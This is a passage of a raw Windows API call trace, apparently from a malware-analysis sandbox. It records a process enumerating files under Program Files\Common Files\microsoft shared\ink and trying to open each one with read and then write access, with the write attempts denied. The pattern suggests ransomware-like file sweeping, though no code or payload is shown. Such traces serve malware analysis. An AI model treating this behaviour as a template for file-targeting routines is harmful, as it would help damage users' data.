Parameter=0x1086e48, Context=0x0) returned 1 [0099.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.489] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xaa, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x55f28, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xaa, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⫃")) returned 0 [0099.489] FindClose (in: hFindFile=0x785d0 | out: hFindFile=0x785d0) returned 1 [0099.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.490] AreFileApisANSI () returned 1 [0099.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml", lpUsedDefaultChar=0x0) returned 74 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.490] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.491] AreFileApisANSI () returned 1 [0099.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0099.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85440 [0099.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned 74 [0099.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.491] GetFileType (hFile=0x418) returned 0x1 [0099.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0099.491] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.491] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.491] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.491] CloseHandle (hObject=0x418) returned 1 [0099.492] AreFileApisANSI () returned 1 [0099.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0099.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85c60 [0099.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned 74 [0099.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.492] GetLastError () returned 0x5 [0099.492] GetLastError () returned 0x5 [0099.492] SetLastError (dwErrCode=0x5) [0099.492] GetLastError () returned 0x5 [0099.492] SetLastError (dwErrCode=0x5) [0099.492] GetLastError () returned 0x5 [0099.492] SetLastError (dwErrCode=0x5) [0099.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0099.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.492] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cdb88, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="oskclearui", cAlternateFileName="OSKCLE~1")) returned 1 [0099.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.493] AreFileApisANSI () returned 1 [0099.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui", lpUsedDefaultChar=0x0) returned 76 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0099.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.493] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.493] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.494] AreFileApisANSI () returned 1 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x851c0 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 76 [0099.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.494] GetLastError () returned 0x5 [0099.494] GetLastError () returned 0x5 [0099.494] SetLastError (dwErrCode=0x5) [0099.494] GetLastError () returned 0x5 [0099.494] SetLastError (dwErrCode=0x5) [0099.494] GetLastError () returned 0x5 [0099.494] SetLastError (dwErrCode=0x5) [0099.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0099.494] AreFileApisANSI () returned 1 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85760 [0099.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x85760, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 76 [0099.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.494] GetLastError () returned 0x5 [0099.494] GetLastError () returned 0x5 [0099.494] SetLastError (dwErrCode=0x5) [0099.494] GetLastError () returned 0x5 [0099.494] SetLastError (dwErrCode=0x5) [0099.494] GetLastError () returned 0x5 [0099.494] SetLastError (dwErrCode=0x5) [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85760 | out: hHeap=0x20000) returned 1 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0099.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.495] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0099.495] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0099.495] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cdb88, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.495] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskclearuibase.xml", cAlternateFileName="")) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4ba80 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ba80 | out: hHeap=0x20000) returned 1 [0099.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0099.497] AreFileApisANSI () returned 1 [0099.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 